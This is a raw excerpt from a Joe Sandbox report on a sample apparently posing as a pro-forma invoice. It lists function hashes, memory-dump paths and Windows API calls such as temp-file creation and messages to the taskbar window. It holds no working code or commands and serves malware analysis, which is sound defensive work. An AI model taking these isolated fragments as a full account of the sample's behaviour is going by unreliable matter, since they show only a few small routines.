                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: 0%=$8%=
                                    • API String ID: 1385522511-2389475881
                                    • Opcode ID: 8b0e896e8382003051a41c62fd3ff537ff6c5f3195c1b8f4bcf129b438fd6741
                                    • Instruction ID: 60a5208ff32e484d882d5369311f5a1ab8a1b0008e0594dff3e941af4718e383
                                    • Opcode Fuzzy Hash: 8b0e896e8382003051a41c62fd3ff537ff6c5f3195c1b8f4bcf129b438fd6741
                                    • Instruction Fuzzy Hash: 99E02039C01A20CBC60F9758B858DC9735BBB1E320F5016A7E4228B1D29B3128818554
                                    APIs
                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0037302F
                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00373044
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Temp$FileNamePath
                                    • String ID: aut
                                    • API String ID: 3285503233-3010740371
                                    • Opcode ID: e140bbd80fb0116ba4da07ccd4a20ad7ff552ec2c49f3c07287472b72044a89f
                                    • Instruction ID: 413d6729e24dc442b0fe39c8cf92bb0473f10b2d643e4f9e2639470b4244d7a6
                                    • Opcode Fuzzy Hash: e140bbd80fb0116ba4da07ccd4a20ad7ff552ec2c49f3c07287472b72044a89f
                                    • Instruction Fuzzy Hash: 5ED05EB650032877DE20A7A4AC0EFCB3A6CDB04750F0006A2B695E2091DBB19984CBE0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID: %.3d$X64
                                    • API String ID: 481472006-1077770165
                                    • Opcode ID: c2bad3a2ca363e6c9e185706d43da75028a1687888a30741b209b0f5c6faf947
                                    • Instruction ID: a1ec3c7bdf18dcb982b34a3498487212421fd95ff95c33dcbb74cf50805fc609
                                    • Opcode Fuzzy Hash: c2bad3a2ca363e6c9e185706d43da75028a1687888a30741b209b0f5c6faf947
                                    • Instruction Fuzzy Hash: E6D01275808108E9CB6297D0CC45DF9B37CBB0C302F508856FC06D1850D624D54CABA1
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0039232C
                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0039233F
                                      • Part of subcall function 0036E97B: Sleep.KERNEL32 ref: 0036E9F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: 48fb997790fc22fdbb124b9f5177f5bed8440ac449e0c578033750a53cc599da
                                    • Instruction ID: 7c55f362beb7e3ffeaa393c4bf3f89e509d8f2078dfa731814c7e74241380b95
                                    • Opcode Fuzzy Hash: 48fb997790fc22fdbb124b9f5177f5bed8440ac449e0c578033750a53cc599da
                                    • Instruction Fuzzy Hash: 2BD0C9363A4310B6E665A7719C0FFC6AA689F40B10F015916B645AA1D4C9A5A8058A54
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0039236C
                                    • PostMessageW.USER32(00000000), ref: 00392373
                                      • Part of subcall function 0036E97B: Sleep.KERNEL32 ref: 0036E9F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: 540b66834909ab866a5b4ff7bce79525e191a19edb3044e67c776cb7d43ce647
                                    • Instruction ID: 46f912d3600ee735ce41f2b34eb1cd4c59d34be6aa4b12b60b906968b8e9359e
                                    • Opcode Fuzzy Hash: 540b66834909ab866a5b4ff7bce79525e191a19edb3044e67c776cb7d43ce647
                                    • Instruction Fuzzy Hash: 13D0A9323903007AE666A3309C0FFC6A6289B00B00F004916B201EA0D4C9A0A8008A08